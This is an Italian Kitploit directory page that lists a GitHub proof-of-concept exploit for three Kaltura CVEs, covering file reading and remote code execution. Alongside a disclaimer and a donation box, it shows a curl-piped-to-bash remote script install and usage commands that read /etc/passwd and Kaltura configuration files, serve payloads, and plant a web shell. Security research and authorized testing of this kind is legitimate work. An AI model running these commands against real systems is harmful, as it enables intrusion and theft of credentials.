Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — Proof-of-concept exploit per CVE-2026-19912, CVE-2026-19913 e CVE-2026-19914, che dimostrano la lettura di file e l'esecuzione remota di codice in Kaltura, destinati a test di sicurezza autorizzati e a scopo educativo. | Kitploit
Strumenti/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingApprendimento e Formazione
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

Proof-of-concept exploit per CVE-2026-19912, CVE-2026-19913 e CVE-2026-19914, che dimostrano la lettura di file e l'esecuzione remota di codice in Kaltura, destinati a test di sicurezza autorizzati e a scopo educativo.

Vedi Repository
8h 24m faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

Donazioni

Aiuta a mantenere questo progetto

Se trovi utile questo progetto, considera di supportarne la manutenzione continua tramite PayPal o ABA Mobile.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ Il dieci per cento di ogni donazione viene devoluto all'Ospedale Pediatrico Kantha Bopha.

Scegli un metodo di pagamento

Donate securely with PayPal

ABA Mobile donation QR code
Scansiona con ABA Mobile · Clicca per ingrandire

⚡ Utilizzo Semplice

Esegui l'ultima versione dello script di download esterno direttamente da GitHub:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

Questo comando richiede Bash e curl. Controlla lo script remoto prima di eseguirlo se non ti fidi della fonte.

Utilizza questo progetto solo in ambienti sicuri e autorizzati come:

  • Macchine virtuali locali
  • Container Docker
  • Configurazioni di laboratorio isolate
  • Ambienti di penetration testing autorizzati

Configurazione di esempio:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Il progetto usa Python, segui i passaggi seguenti

# Crea un ambiente virtuale
python -m venv venv

# Attiva l'ambiente virtuale

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Installa le dipendenze
pip install -r requirements.txt

Esempio di utilizzo:

root@kitploit:~
# 1. Lettura file (più affidabile, funziona come descritto nell'articolo)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. Solo il server dei payload (da usare con Burp / curl manualmente)
python3 kaltura_poc.py serve --lport 8888

# 3. Scheletro della catena completa
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

Crediti o Riferimenti

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 Repository Educativo di Ricerca sulla Sicurezza

Un repository per apprendere, testare e ricercare concetti di cybersecurity in ambienti controllati.


⚠️ Disclaimer di Sicurezza e Legale

Scopo

Questo repository è destinato esclusivamente alla ricerca sulla sicurezza educativa e autorizzata.

È progettato per aiutare gli utenti a conoscere:

  • Le vulnerabilità di sicurezza
  • I concetti di sandbox e isolamento
  • Le pratiche di codifica sicura e difensiva

Solo Uso Autorizzato

Utilizza questo repository solo in ambienti in cui hai il permesso, come:

  • Laboratori personali o macchine virtuali
  • Ambienti Docker o isolati
  • Penetration testing autorizzato
  • Formazione sulla cybersecurity o ricerca accademica

L'uso non autorizzato o illegale è severamente vietato.


Nessuna Responsabilità

L'autore e i collaboratori non sono responsabili per qualsiasi danno, uso improprio, problema legale o perdita causata da questo progetto.

Utilizzando questo repository, accetti che:

  • Sei responsabile delle tue azioni
  • Lo utilizzerai in modo legale ed etico
  • Il progetto è fornito senza garanzia

Uso Etico

Questo progetto è pensato per:

  • Ricerca sulla sicurezza difensiva
  • Educazione alla cybersecurity
  • Consapevolezza delle vulnerabilità
  • Ricerca su sistemi e software sicuri

Si prega di seguire le pratiche di divulgazione responsabile e di rispettare tutte le leggi applicabili.


Contatti

Per divulgazione responsabile o collaborazione, contatta il manutentore del repository tramite GitHub.


Progetti Correlati

Esplora la Raccolta di PoC CVE per ulteriori risorse di proof-of-concept per CVE destinate alla ricerca sulla sicurezza autorizzata e all'educazione.

Scarica lo strumento